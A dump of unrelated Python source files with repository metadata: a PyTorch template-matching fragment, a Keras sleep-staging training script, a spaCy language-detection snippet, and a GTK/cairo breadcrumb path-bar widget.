from torchvision import datasets, models
import matplotlib.pyplot as plt
from tensorboardX import SummaryWriter, writer
import os
import argparse
import random
import numpy as np
import warnings
from PIL import Image
plt.ion()    # interactive mode
warnings.filterwarnings('ignore')
os.environ['CUDA_VISIBLE_DEVICES'] = '1' # opt.cuda
device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # "cpu" #
# TensorBoard writer for images/metrics (used by the commented-out loop below)
datawriter = SummaryWriter()
data_root = './Dataset' # '../Dataset/Kaggle265'
target_root = './Targetset' # '../Dataset/Kaggle265'
num_workers = 0
# aim_loader comes from fim_mission (project module)
loader = aim_loader(data_root, target_root, num_workers)
# ImageNet-pretrained ResNet-50 backbone
model_ft = models.resnet50(pretrained=True).to(device)
print(model_ft)
'''
# criterion = torch.nn.MSELoss()
criterion = torch.nn.L1Loss()
step = 16
model_ft.eval()
with torch.no_grad():
for num_iter, (data, target, data_size, target_size) in enumerate(tqdm(loader)):
target = target.to(device)
data = data.to(device)
data_size = data_size.item()
target_size = target_size.item()
min_loss = 1024.
min_i, min_j = -1, -1
for i in range(0, data_size-target_size, step):
for j in range(0, data_size-target_size, step):
trans_T = model_ft(target)
trans_D = model_ft(data[:,:,i:i+target_size,j:j+target_size])
loss = criterion(trans_T, trans_D).item()
if min_loss>loss:
min_i, min_j = i, j
min_loss = loss
head_i = max(0, min_i-step)
head_j = max(0, min_j-step)
tail_i = min(min_i+step, data_size)
tail_j = min(min_j+step, data_size)
for i in range(head_i, tail_i):
for j in range(head_j, tail_j):
trans_T = model_ft(target)
trans_D = model_ft(data[:,:,i:i+target_size,j:j+target_size])
loss = criterion(trans_T, trans_D).item()
if min_loss>loss:
min_i, min_j = i, j
min_loss = loss
data[0,:,min_i:min_i+target_size,min_j:min_j+target_size] = target[0,:,:,:]
datawriter.add_image('new_img', data[0,:,:,:], num_iter)
datawriter.add_scalar('img_loss', min_loss, num_iter)
x, y = get_position(min_i, min_j, data_size, target_size)
print('Iter : {}'.format(num_iter))
print('Pos = ({}, {})'.format(x, y))
print('Loss = {}'.format(min_loss))
datawriter.close()
''' | 32.305882 | 84 | 0.633285 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,929 | 0.702476 |
6346bc83f256deb2c811a42a3cf69e8067d988ea | 4,337 | py | Python | sleep_staging_methods/multitaper/train_8m.py | GuanLab/DeepSleep | 220ae1348aaaba115b82d89a9a5ab5bb6f569062 | [
"MIT"
] | 27 | 2019-04-26T21:12:52.000Z | 2022-03-13T15:51:18.000Z | sleep_staging_methods/multitaper/train_8m.py | Hongyang449/DeepSleep | f779e050e4ad1ba7b96ddf0c9aef421770bbbd53 | [
"MIT"
] | 3 | 2021-07-20T15:35:07.000Z | 2021-11-12T15:35:52.000Z | sleep_staging_methods/multitaper/train_8m.py | GuanLab/DeepSleep | 220ae1348aaaba115b82d89a9a5ab5bb6f569062 | [
"MIT"
] | 9 | 2019-06-12T20:10:24.000Z | 2021-12-08T12:45:36.000Z | from __future__ import print_function
import os
import sys
import numpy as np
from keras.models import Model
from keras.layers import Input, concatenate, Conv1D, MaxPooling1D, Conv2DTranspose,Lambda
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint
from keras import backend as K
import tensorflow as tf
import keras
import cv2
import scipy.io
# for Fourier Transform
from scipy import signal
#from spectrum import pmtm
#from keras.backend.tensorflow_backend import set_session
#config = tf.ConfigProto()
#config.gpu_options.per_process_gpu_memory_fraction = 0.9
#set_session(tf.Session(config=config))
K.set_image_data_format('channels_last') # TF dimension ordering in this code
# number of recordings pooled into each generated batch
batch_size=5
# NOTE(review): 'ss' is not referenced in this chunk -- confirm it is used elsewhere.
ss = 10
def scaleImage (image,scale):
    """Horizontally rescale a 2-D array by *scale*, then center-crop or
    center-pad back to the original (x, y) shape. Returns a float array."""
    [x,y]= image.shape
    x1=x
    y1=int(round(y*scale))
    image=cv2.resize(image.astype('float32'),(y1,x1)) # check this for multiple channnels!!
    new=np.zeros((x,y))
    if (y1>y):
        # scaled wider than original: crop the central y columns
        start=int(round(y1/2-y/2))
        end=start+y
        new=image[:,start:end]
    else:
        # scaled narrower: paste centered onto a zero canvas
        # NOTE(review): int(round(y-y1)/2) rounds *before* halving --
        # possibly intended as int(round((y-y1)/2)); confirm.
        new_start=int(round(y-y1)/2)
        new_end=new_start+y1
        new[:,new_start:new_end]=image
    return new
def label_major_vote(input_data,scale_pool):
    """Downsample a (1, N) label track by majority vote over windows of
    length *scale_pool*.

    Labels are expected in {-1, 0, 1}; ties resolve to the smallest label.
    Returns an int array of shape (1, N // scale_pool).
    """
    n_windows = int(input_data.shape[1] / scale_pool)
    # rows = samples within a window, columns = windows
    windows = input_data.reshape(n_windows, scale_pool).T
    windows = windows.astype(int) + 1  # shift {-1,0,1} -> {0,1,2} for bincount
    counts = np.apply_along_axis(lambda col: np.bincount(col, minlength=3), 0, windows)
    majority = np.apply_along_axis(np.argmax, 0, counts) - 1
    return majority.reshape(1, n_windows)
import unet
import random
model = unet.get_unet()
#model.load_weights('weights_' + sys.argv[1] + '.h5')
#model.summary()
from datetime import datetime
import random
# feature / label spectrogram directories (one .npy per recording id)
path1='/ssd/hongyang/2018/physionet/data/multitaper96/'
path2='/ssd/hongyang/2018/physionet/data/multitaper96_label/'
new_path='/ssd/hongyang/2018/physionet/data/new_arousal/'
all_ids=open('whole_train.dat','r')
all_line=[]
for line in all_ids:
    all_line.append(line.rstrip())
all_ids.close()
#random.seed(datetime.now())
# seed with the CLI fold index so the train/validation split is reproducible
random.seed(int(sys.argv[1]))
random.shuffle(all_line)
partition_ratio=0.8
train_line=all_line[0:int(len(all_line)*partition_ratio)]
test_line=all_line[int(len(all_line)*partition_ratio):len(all_line)]
# re-randomize everything after the deterministic split
random.seed(datetime.now())
def generate_data(train_line, batch_size, if_train):
    """Replaces Keras' native ImageDataGenerator.

    Infinite generator: each yield pools all usable 32-column windows from
    *batch_size* recordings (shuffled per epoch pass).
    NOTE(review): *if_train* and the augmentation parameters below are not
    used in this body -- confirm whether augmentation was meant to apply.
    """
    ##### augmentation parameters ######
    if_time=False
    max_scale=1.15
    min_scale=1
    if_mag=True
    max_mag=1.15
    min_mag=0.9
    if_flip=False
    ####################################
    i = 0
    while True:
        image_batch = []
        label_batch = []
        for b in range(batch_size):
            if i == len(train_line):
                # one pass over the list done; reshuffle and start over
                i = 0
                random.shuffle(train_line)
            sample = train_line[i]
            i += 1
            the_id=sample.split('/')[-1]
            image = np.load(path1 + the_id + '.npy')
            label = np.load(path2 + the_id + '.npy')
            index=np.arange(0,20960,32)
            random.shuffle(index)
            for k in index: #
                # pool labels 16x; windows containing only ignore-label (-1)
                # are skipped
                label_final=label_major_vote(label[:,k:(k+32)],2**4)
                if np.sum(label_final!=-1) > 0:
                    image_batch.append(image[:,k:(k+32)].T)
                    label_batch.append(label_final.T)
        image_batch=np.array(image_batch)
        label_batch=np.array(label_batch)
        # print(image_batch.shape,label_batch.shape)
        yield image_batch, label_batch
#model_checkpoint = ModelCheckpoint('weights.h5', monitor='val_loss', save_best_only=False)
# checkpoint file name is keyed by the CLI fold index
name_model='weights_' + sys.argv[1] + '.h5'
callbacks = [
#    keras.callbacks.TensorBoard(log_dir='./',
#        histogram_freq=0, write_graph=True, write_images=False),
    # save the model after every epoch (not only the best one)
    keras.callbacks.ModelCheckpoint(os.path.join('./', name_model),
        verbose=0,save_weights_only=False,monitor='val_loss')
    #verbose=0,save_weights_only=False,monitor='val_loss',save_best_only=True)
]
# NOTE(review): nb_epoch is the legacy Keras 1 argument (renamed to
# 'epochs' in Keras 2) -- confirm the Keras version this targets.
model.fit_generator(
    generate_data(train_line, batch_size,True),
    steps_per_epoch=int(len(train_line) // batch_size), nb_epoch=25,
    validation_data=generate_data(test_line,batch_size,False),
    validation_steps=int(len(test_line) // batch_size),callbacks=callbacks)
| 32.609023 | 93 | 0.685958 | 0 | 0 | 1,228 | 0.283145 | 0 | 0 | 0 | 0 | 1,122 | 0.258704 |
6346c2addc2cf35274df3428a19c76028b86eba4 | 252 | py | Python | Sprachanalyse/versuch.py | DemonicStorm/LitBlogRepo | 0fe436071840f3b9af59f4363967cfc6eb397865 | [
"MIT"
] | 2 | 2022-02-15T19:18:12.000Z | 2022-02-16T08:06:20.000Z | Sprachanalyse/versuch.py | DemonicStorm/LitBlogRepo | 0fe436071840f3b9af59f4363967cfc6eb397865 | [
"MIT"
] | null | null | null | Sprachanalyse/versuch.py | DemonicStorm/LitBlogRepo | 0fe436071840f3b9af59f4363967cfc6eb397865 | [
"MIT"
] | null | null | null | import spacy
from spacy_langdetect import LanguageDetector
import en_core_web_sm
from glob import glob
# Load the small English spaCy pipeline and attach language detection
# as the last pipe component.
nlp = en_core_web_sm.load()
#nlp = spacy.load('en')
nlp.add_pipe(LanguageDetector(), name='language_detector', last=True)
# NOTE(review): this prints the LanguageDetector *class*, not a detection
# result -- probably leftover debugging output.
print(LanguageDetector)
63494cbde2d85460ac5f8725fc7d01e2aee00fe5 | 43,623 | py | Python | usr/lib/tuquito/tuquito-software-manager/widgets/pathbar2.py | emmilinuxorg/emmi-aplicativos | ae84dcc8b9441dd6c735f70a9b1a8ec91871955d | [
"MIT"
] | null | null | null | usr/lib/tuquito/tuquito-software-manager/widgets/pathbar2.py | emmilinuxorg/emmi-aplicativos | ae84dcc8b9441dd6c735f70a9b1a8ec91871955d | [
"MIT"
] | null | null | null | usr/lib/tuquito/tuquito-software-manager/widgets/pathbar2.py | emmilinuxorg/emmi-aplicativos | ae84dcc8b9441dd6c735f70a9b1a8ec91871955d | [
"MIT"
] | null | null | null | # Copyright (C) 2009 Matthew McGowan
#
# Authors:
# Matthew McGowan
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import rgb
import gtk
import cairo
import pango
import gobject
from rgb import to_float as f
# pi constants (used by the cairo arc-drawing code below)
M_PI = 3.1415926535897931
PI_OVER_180 = 0.017453292519943295
class PathBar(gtk.DrawingArea):
    """Breadcrumb-style path bar drawn with cairo.

    Parts (segments) are appended/removed dynamically; the widget handles
    its own hit-testing, hover/active states and a horizontal scroll-in
    animation for newly appended parts.
    """

    # shapes: which outline a segment is drawn with
    SHAPE_RECTANGLE = 0
    SHAPE_START_ARROW = 1
    SHAPE_MID_ARROW = 2
    SHAPE_END_CAP = 3
    def __init__(self, group=None):
        # NOTE(review): *group* is accepted but not used in this method.
        gtk.DrawingArea.__init__(self)
        self.__init_drawing()
        self.set_redraw_on_allocate(False)
        # breadcrumb parts, ordered left to right
        self.__parts = []
        self.__active_part = None
        self.__focal_part = None
        self.__button_down = False
        # scroll-animation timeout id and current pixel offset
        self.__scroller = None
        self.__scroll_xO = 0
        self.theme = self.__pick_theme()
        # setup event handling
        self.set_flags(gtk.CAN_FOCUS)
        self.set_events(gtk.gdk.POINTER_MOTION_MASK|
                        gtk.gdk.BUTTON_PRESS_MASK|
                        gtk.gdk.BUTTON_RELEASE_MASK|
                        gtk.gdk.KEY_RELEASE_MASK|
                        gtk.gdk.KEY_PRESS_MASK|
                        gtk.gdk.LEAVE_NOTIFY_MASK)
        self.connect("motion-notify-event", self.__motion_notify_cb)
        self.connect("leave-notify-event", self.__leave_notify_cb)
        self.connect("button-press-event", self.__button_press_cb)
        self.connect("button-release-event", self.__button_release_cb)
        # self.connect("key-release-event", self.__key_release_cb)
        self.connect("realize", self.__realize_cb)
        self.connect("expose-event", self.__expose_cb)
        self.connect("style-set", self.__style_change_cb)
        self.connect("size-allocate", self.__allocation_change_cb)
        self.last_label = None
        return
    def set_active(self, part):
        """Make *part* the active (selected) segment and redraw as needed."""
        part.set_state(gtk.STATE_ACTIVE)
        prev, redraw = self.__set_active(part)
        if redraw:
            # repaint both the previously active part and the new one
            self.queue_draw_area(*prev.get_allocation_tuple())
            self.queue_draw_area(*part.get_allocation_tuple())
        self.last_label = None
        return

    def get_active(self):
        """Return the currently active part, or None."""
        return self.__active_part
# def get_left_part(self):
# active = self.get_active()
# if not active:
# return self.__parts[0]
# i = self.__parts.index(active)+1
# if i > len(self.__parts)-1:
# i = 0
# return self.__parts[i]
# def get_right_part(self):
# active = self.get_active()
# if not active:
# return self.__parts[0]
# i = self.__parts.index(active)-1
# if i < 0:
# i = len(self.__parts)-1
# return self.__parts[i]
    def append(self, part):
        """Append *part* to the bar, scrolling it in if animation is enabled.

        Returns False so it can be used directly as a one-shot idle/timeout
        callback.
        """
        prev, did_shrink = self.__append(part)
        if not self.get_property("visible"):
            return False
        if self.theme.animate and len(self.__parts) > 1:
            aw = self.theme.arrow_width
            # calc draw_area
            x,y,w,h = part.get_allocation_tuple()
            w += aw
            # begin scroll animation
            self.__hscroll_out_init(
                part.get_width(),
                gtk.gdk.Rectangle(x,y,w,h),
                self.theme.scroll_duration_ms,
                self.theme.scroll_fps
                )
        else:
            self.queue_draw_area(*part.get_allocation_tuple())
        return False

    def remove(self, part):
        """Remove *part* from the bar; the first part can never be removed."""
        if len(self.__parts)-1 < 1:
            #print 'The first part is sacred ;)'
            return
        old_w = self.__draw_width()
        # remove part from interal part list
        try:
            del self.__parts[self.__parts.index(part)]
        except:
            # part not in the list; nothing to delete
            pass
        self.__compose_parts(self.__parts[-1], False)
        if old_w >= self.allocation.width:
            self.__grow_check(old_w, self.allocation)
            self.queue_draw()
        else:
            self.queue_draw_area(*part.get_allocation_tuple())
            self.queue_draw_area(*self.__parts[-1].get_allocation_tuple())
        return
    def __set_active(self, part):
        """Activate *part*: trim all parts after it, fire its callback and
        deactivate the previously active part.

        Returns (previously_active_part, needs_redraw).
        """
        # NOTE(review): self.id_to_part is not assigned anywhere in this
        # chunk -- presumably provided by a subclass or set externally.
        bigger = False
        for i in self.id_to_part:
            apart = self.id_to_part[i]
            if bigger:
                self.remove(apart)
            if apart == part:
                bigger = True
        prev_active = self.__active_part
        redraw = False
        if part.callback:
            part.callback(self, part.obj)
        if prev_active and prev_active != part:
            prev_active.set_state(gtk.STATE_NORMAL)
            redraw = True
        self.__active_part = part
        return prev_active, redraw

    def __append(self, part):
        """Bookkeeping for appending *part*; returns (prev_part, did_shrink)."""
        # clean up any exisitng scroll callbacks
        if self.__scroller:
            gobject.source_remove(self.__scroller)
            self.__scroll_xO = 0
        # the basics
        x = self.__draw_width()
        self.__parts.append(part)
        part.set_pathbar(self)
        # NOTE(review): set_active() returns None, so prev_active is always
        # None here -- confirm intent.
        prev_active = self.set_active(part)
        # determin part shapes, and calc modified parts widths
        prev = self.__compose_parts(part, True)
        # set the position of new part
        part.set_x(x)
        # check parts fit to widgets allocated width
        if x + part.get_width() > self.allocation.width and \
            self.allocation.width != 1:
            self.__shrink_check(self.allocation)
            return prev, True
        return prev, False
# def __shorten(self, n):
# n = int(n)
# old_w = self.__draw_width()
# end_active = self.get_active() == self.__parts[-1]
# if len(self.__parts)-n < 1:
# print WARNING + 'The first part is sacred ;)' + ENDC
# return old_w, False
# del self.__parts[-n:]
# self.__compose_parts(self.__parts[-1], False)
# if end_active:
# self.set_active(self.__parts[-1])
# if old_w >= self.allocation.width:
# self.__grow_check(old_w, self.allocation)
# return old_w, True
# return old_w, False
    def __shrink_check(self, allocation):
        """Clamp part widths so the whole path fits *allocation*.

        Widths are reduced left-to-right, never below theme.min_part_width;
        following parts are shifted left by the accumulated reduction.
        """
        path_w = self.__draw_width()
        shrinkage = path_w - allocation.width
        mpw = self.theme.min_part_width
        xO = 0
        for part in self.__parts[:-1]:
            w = part.get_width()
            dw = 0
            if w - shrinkage <= mpw:
                dw = w - mpw
                shrinkage -= dw
                part.set_size(mpw, -1)
                part.set_x(part.get_x() - xO)
            else:
                part.set_size(w - shrinkage, -1)
                part.set_x(part.get_x() - xO)
                dw = shrinkage
                shrinkage = 0
            xO += dw
        last = self.__parts[-1]
        last.set_x(last.get_x() - xO)
        return

    def __grow_check(self, old_width, allocation):
        """Give freed width back to truncated parts, right-to-left, then
        re-left-align all parts."""
        parts = self.__parts
        if len(parts) == 0:
            return
        growth = old_width - self.__draw_width()
        parts.reverse()
        for part in parts:
            bw = part.get_size_requisition()[0]
            w = part.get_width()
            if w < bw:
                dw = bw - w
                if dw <= growth:
                    growth -= dw
                    part.set_size(bw, -1)
                    part.set_x(part.get_x() + growth)
                else:
                    part.set_size(w + growth, -1)
                    growth = 0
            else:
                part.set_x(part.get_x() + growth)
        parts.reverse()
        shift = parts[0].get_x()
        # left align parts
        if shift > 0:
            for part in parts: part.set_x(part.get_x() - shift)
        return
    def __compose_parts(self, last, prev_set_size):
        """Assign shapes (rect / arrows / end cap) to the last two parts and
        recalculate their size requisitions.

        Returns the second-to-last part, or None if there is only one part.
        """
        parts = self.__parts
        if len(parts) == 1:
            last.set_shape(self.SHAPE_RECTANGLE)
            last.set_size(*last.calc_size_requisition())
            prev = None
        elif len(parts) == 2:
            prev = parts[0]
            prev.set_shape(self.SHAPE_START_ARROW)
            prev.calc_size_requisition()
            last.set_shape(self.SHAPE_END_CAP)
            last.set_size(*last.calc_size_requisition())
        else:
            prev = parts[-2]
            prev.set_shape(self.SHAPE_MID_ARROW)
            prev.calc_size_requisition()
            last.set_shape(self.SHAPE_END_CAP)
            last.set_size(*last.calc_size_requisition())
        if prev and prev_set_size:
            prev.set_size(*prev.get_size_requisition())
        return prev

    def __draw_width(self):
        """Total pixel width currently occupied by all parts (x + w of last)."""
        l = len(self.__parts)
        if l == 0:
            return 0
        a = self.__parts[-1].allocation
        return a[0] + a[2]
    def __hscroll_out_init(self, distance, draw_area, duration, fps):
        """Start the scroll-in animation timer for a newly appended part."""
        self.__scroller = gobject.timeout_add(
            int(1000.0 / fps),  # interval
            self.__hscroll_out_cb,
            distance,
            duration*0.001,   # 1 over duration (converted to seconds)
            gobject.get_current_time(),
            draw_area.x,
            draw_area.y,
            draw_area.width,
            draw_area.height)
        return

    def __hscroll_out_cb(self, distance, duration, start_t, x, y, w, h):
        """Timeout callback: ease the scroll offset towards 0, redrawing the
        animated area each frame; returns False to stop the timer."""
        cur_t = gobject.get_current_time()
        xO = distance - distance*((cur_t - start_t) / duration)
        if xO > 0:
            self.__scroll_xO = xO
            self.queue_draw_area(x, y, w, h)
        else:   # final frame
            self.__scroll_xO = 0
            # redraw the entire widget
            # incase some timeouts are skipped due to high system load
            self.queue_draw()
            self.__scroller = None
            return False
        return True

    def __part_at_xy(self, x, y):
        """Hit-test: return the part under widget coords (x, y), or None."""
        for part in self.__parts:
            a = part.get_allocation()
            region = gtk.gdk.region_rectangle(a)
            if region.point_in(int(x), int(y)):
                return part
        return None
    def __draw_hscroll(self, cr):
        """Draw only the last two parts while the scroll animation runs."""
        if len(self.__parts) < 2:
            return
        # draw the last two parts
        prev, last = self.__parts[-2:]
        # style theme stuff
        style, r, aw, shapes = self.style, self.theme.curvature, \
            self.theme.arrow_width, self.__shapes
        # draw part that need scrolling
        self.__draw_part(cr,
                         last,
                         style,
                         r,
                         aw,
                         shapes,
                         self.__scroll_xO)
        # draw the last part that does not scroll
        self.__draw_part(cr,
                         prev,
                         style,
                         r,
                         aw,
                         shapes)
        return

    def __draw_all(self, cr, event_area):
        """Draw every part intersecting *event_area*, back to front."""
        style = self.style
        r = self.theme.curvature
        aw = self.theme.arrow_width
        shapes = self.__shapes
        region = gtk.gdk.region_rectangle(event_area)
        # if a scroll is pending we want to not draw the final part,
        # as we don't want to prematurely reveal the part befor the
        # scroll animation has had a chance to start
        if self.__scroller:
            parts = self.__parts[:-1]
        else:
            parts = self.__parts
        # note: [:-1] above yields a copy, so in that branch the reverse()
        # calls below do not touch self.__parts itself
        parts.reverse()
        for part in parts:
            if region.rect_in(part.get_allocation()) != gtk.gdk.OVERLAP_RECTANGLE_OUT:
                self.__draw_part(cr, part, style, r, aw, shapes)
        parts.reverse()
        return
def __draw_part_ltr(self, cr, part, style, r, aw, shapes, sxO=0):
x, y, w, h = part.get_allocation()
shape = part.shape
state = part.state
icon_pb = part.icon.pixbuf
cr.save()
cr.translate(x-sxO, y)
# draw bg
self.__draw_part_bg(cr, part, w, h, state, shape, style,r, aw, shapes)
# determine left margin. left margin depends on part shape
# and whether there exists an icon or not
if shape == self.SHAPE_MID_ARROW or shape == self.SHAPE_END_CAP:
margin = int(0.75*self.theme.arrow_width + self.theme.xpadding)
else:
margin = self.theme.xpadding
# draw icon
if icon_pb:
cr.set_source_pixbuf(
icon_pb,
self.theme.xpadding-sxO,
(alloc.height - icon_pb.get_height())/2)
cr.paint()
margin += icon_pb.get_width() + self.theme.spacing
# if space is limited and an icon is set, dont draw label
# otherwise, draw label
if w == self.theme.min_part_width and icon_pb:
pass
else:
layout = part.get_layout()
lw, lh = layout.get_pixel_size()
dst_x = x + margin - int(sxO)
dst_y = (self.allocation.height - lh)/2+1
style.paint_layout(
self.window,
self.theme.text_state[state],
False,
(dst_x, dst_y, lw+4, lh), # clip area
self,
None,
dst_x,
dst_y,
layout)
cr.restore()
return
def __draw_part_rtl(self, cr, part, style, r, aw, shapes, sxO=0):
x, y, w, h = part.get_allocation()
shape = part.shape
state = part.state
icon_pb = part.icon.pixbuf
cr.save()
cr.translate(x+sxO, y)
# draw bg
self.__draw_part_bg(cr, part, w, h, state, shape, style,r, aw, shapes)
# determine left margin. left margin depends on part shape
# and whether there exists an icon or not
if shape == self.SHAPE_MID_ARROW or shape == self.SHAPE_END_CAP:
margin = self.theme.arrow_width + self.theme.xpadding
else:
margin = self.theme.xpadding
# draw icon
if icon_pb:
margin += icon_pb.get_width()
cr.set_source_pixbuf(
icon_pb,
w - margin + sxO,
(h - icon_pb.get_height())/2)
cr.paint()
margin += self.spacing
# if space is limited and an icon is set, dont draw label
# otherwise, draw label
if w == self.theme.min_part_width and icon_pb:
pass
else:
layout = part.get_layout()
lw, lh = layout.get_pixel_size()
dst_x = x + part.get_width() - margin - lw + int(sxO)
dst_y = (self.allocation.height - lh)/2+1
style.paint_layout(
self.window,
self.theme.text_state[state],
False,
None,
self,
None,
dst_x,
dst_y,
layout)
cr.restore()
return
    def __draw_part_bg(self, cr, part, w, h, state, shape, style, r, aw, shapes):
        """Fill and outline a part's background for the given widget state."""
        # outer slight bevel or focal highlight
        shapes[shape](cr, 0, 0, w, h, r, aw)
        cr.set_source_rgba(0, 0, 0, 0.055)
        cr.fill()
        # colour scheme dicts
        bg = self.theme.bg_colors
        outer = self.theme.dark_line_colors
        inner = self.theme.light_line_colors
        # bg linear vertical gradient
        if state != gtk.STATE_PRELIGHT:
            color1, color2 = bg[state]
        else:
            # prelight colour differs for the active vs. a normal part
            if part != self.get_active():
                color1, color2 = bg[self.theme.PRELIT_NORMAL]
            else:
                color1, color2 = bg[self.theme.PRELIT_ACTIVE]
        shapes[shape](cr, 1, 1, w-1, h-1, r, aw)
        lin = cairo.LinearGradient(0, 0, 0, h-1)
        lin.add_color_stop_rgb(0.0, *color1)
        lin.add_color_stop_rgb(1.0, *color2)
        cr.set_source(lin)
        cr.fill()
        cr.set_line_width(1.0)
        # strong outline
        shapes[shape](cr, 1.5, 1.5, w-1.5, h-1.5, r, aw)
        cr.set_source_rgb(*outer[state])
        cr.stroke()
        # inner bevel/highlight
        if self.theme.light_line_colors[state]:
            shapes[shape](cr, 2.5, 2.5, w-2.5, h-2.5, r, aw)
            # note: r is rebound here (shadows the radius parameter); the
            # radius is no longer needed past the shapes[] call above
            r, g, b = inner[state]
            cr.set_source_rgba(r, g, b, 0.6)
            cr.stroke()
        return
    def __shape_rect(self, cr, x, y, w, h, r, aw):
        """Path: rounded rectangle (single, standalone part)."""
        global M_PI, PI_OVER_180
        cr.new_sub_path()
        cr.arc(r+x, r+y, r, M_PI, 270*PI_OVER_180)
        cr.arc(w-r, r+y, r, 270*PI_OVER_180, 0)
        cr.arc(w-r, h-r, r, 0, 90*PI_OVER_180)
        cr.arc(r+x, h-r, r, 90*PI_OVER_180, M_PI)
        cr.close_path()
        return

    def __shape_start_arrow_ltr(self, cr, x, y, w, h, r, aw):
        """Path: first part, rounded left edge with arrow head on the right."""
        global M_PI, PI_OVER_180
        cr.new_sub_path()
        cr.arc(r+x, r+y, r, M_PI, 270*PI_OVER_180)
        # arrow head
        cr.line_to(w-aw+1, y)
        cr.line_to(w, (h+y)*0.5)
        cr.line_to(w-aw+1, h)
        cr.arc(r+x, h-r, r, 90*PI_OVER_180, M_PI)
        cr.close_path()
        return

    def __shape_mid_arrow_ltr(self, cr, x, y, w, h, r, aw):
        """Path: middle part, flat left edge with arrow head on the right."""
        cr.move_to(-1, y)
        # arrow head
        cr.line_to(w-aw+1, y)
        cr.line_to(w, (h+y)*0.5)
        cr.line_to(w-aw+1, h)
        cr.line_to(-1, h)
        cr.close_path()
        return

    def __shape_end_cap_ltr(self, cr, x, y, w, h, r, aw):
        """Path: last part, flat left edge with rounded right edge."""
        global M_PI, PI_OVER_180
        cr.move_to(-1, y)
        cr.arc(w-r, r+y, r, 270*PI_OVER_180, 0)
        cr.arc(w-r, h-r, r, 0, 90*PI_OVER_180)
        cr.line_to(-1, h)
        cr.close_path()
        return

    def __shape_start_arrow_rtl(self, cr, x, y, w, h, r, aw):
        """Path: RTL first part, arrow head on the left, rounded right edge."""
        global M_PI, PI_OVER_180
        cr.new_sub_path()
        cr.move_to(x, (h+y)*0.5)
        cr.line_to(aw-1, y)
        cr.arc(w-r, r+y, r, 270*PI_OVER_180, 0)
        cr.arc(w-r, h-r, r, 0, 90*PI_OVER_180)
        cr.line_to(aw-1, h)
        cr.close_path()
        return

    def __shape_mid_arrow_rtl(self, cr, x, y, w, h, r, aw):
        """Path: RTL middle part, arrow head on the left, flat right edge."""
        cr.move_to(x, (h+y)*0.5)
        cr.line_to(aw-1, y)
        cr.line_to(w+1, y)
        cr.line_to(w+1, h)
        cr.line_to(aw-1, h)
        cr.close_path()
        return

    def __shape_end_cap_rtl(self, cr, x, y, w, h, r, aw):
        """Path: RTL last part, rounded left edge, flat right edge."""
        global M_PI, PI_OVER_180
        cr.arc(r+x, r+y, r, M_PI, 270*PI_OVER_180)
        cr.line_to(w+1, y)
        cr.line_to(w+1, h)
        cr.arc(r+x, h-r, r, 90*PI_OVER_180, M_PI)
        cr.close_path()
        return
    def __state(self, part):
        # returns the idle state of the part depending on
        # whether part is active or not.
        if part == self.__active_part:
            return gtk.STATE_ACTIVE
        return gtk.STATE_NORMAL

    def __tooltip_check(self, part):
        # only show a tooltip if part is truncated, i.e. not all label text is
        # visible. The tooltip is disabled first and re-enabled from a short
        # timeout so its position follows the pointer between parts.
        if part.is_truncated():
            self.set_has_tooltip(False)
            gobject.timeout_add(50, self.__set_tooltip_cb, part.label)
        else:
            self.set_has_tooltip(False)
        return

    def __set_tooltip_cb(self, text):
        # callback allows the tooltip position to be updated as pointer moves
        # accross different parts
        self.set_has_tooltip(True)
        self.set_tooltip_markup(text)
        return False

    def __pick_theme(self, name=None):
        """Return the PathBarTheme matching the current GTK theme name,
        falling back to the Human theme."""
        name = name or gtk.settings_get_default().get_property("gtk-theme-name")
        themes = PathBarThemes.DICT
        if themes.has_key(name):
            return themes[name]()
        #print "No styling hints for %s are available" % name
        return PathBarThemeHuman()
    def __init_drawing(self):
        """Bind the draw function and shape table for LTR or RTL layout."""
        if self.get_direction() != gtk.TEXT_DIR_RTL:
            self.__draw_part = self.__draw_part_ltr
            self.__shapes = {
                self.SHAPE_RECTANGLE : self.__shape_rect,
                self.SHAPE_START_ARROW : self.__shape_start_arrow_ltr,
                self.SHAPE_MID_ARROW : self.__shape_mid_arrow_ltr,
                self.SHAPE_END_CAP : self.__shape_end_cap_ltr}
        else:
            self.__draw_part = self.__draw_part_rtl
            self.__shapes = {
                self.SHAPE_RECTANGLE : self.__shape_rect,
                self.SHAPE_START_ARROW : self.__shape_start_arrow_rtl,
                self.SHAPE_MID_ARROW : self.__shape_mid_arrow_rtl,
                self.SHAPE_END_CAP : self.__shape_end_cap_rtl}
        return
def __motion_notify_cb(self, widget, event):
    # Track pointer movement: maintain the "focal" (hovered) part,
    # applying prelight / restoring idle states and queueing redraws.
    if self.__scroll_xO > 0:
        # a scroll animation is in progress; ignore hover updates
        return
    part = self.__part_at_xy(event.x, event.y)
    prev_focal = self.__focal_part
    if self.__button_down:
        # while the button is held, only un-highlight when the pointer
        # drags off the pressed part
        if prev_focal and part != prev_focal:
            prev_focal.set_state(self.__state(prev_focal))
            self.queue_draw_area(*prev_focal.get_allocation_tuple())
        return
    self.__button_down = False
    if part and part.state != gtk.STATE_PRELIGHT:
        # entered a new part: prelight it, restore the previous one
        self.__tooltip_check(part)
        part.set_state(gtk.STATE_PRELIGHT)
        if prev_focal:
            prev_focal.set_state(self.__state(prev_focal))
            self.queue_draw_area(*prev_focal.get_allocation_tuple())
        self.__focal_part = part
        self.queue_draw_area(*part.get_allocation_tuple())
    elif not part and prev_focal != None:
        # pointer is over empty space: clear any previous highlight
        prev_focal.set_state(self.__state(prev_focal))
        self.queue_draw_area(*prev_focal.get_allocation_tuple())
        self.__focal_part = None
    return
def __leave_notify_cb(self, widget, event):
    """Clear hover/press state when the pointer leaves the widget."""
    self.__button_down = False
    focal = self.__focal_part
    if focal:
        focal.set_state(self.__state(focal))
        self.queue_draw_area(*focal.get_allocation_tuple())
        self.__focal_part = None
    return
def __button_press_cb(self, widget, event):
    """Mark the part under the pointer as selected on button press."""
    self.__button_down = True
    pressed = self.__part_at_xy(event.x, event.y)
    if not pressed:
        return
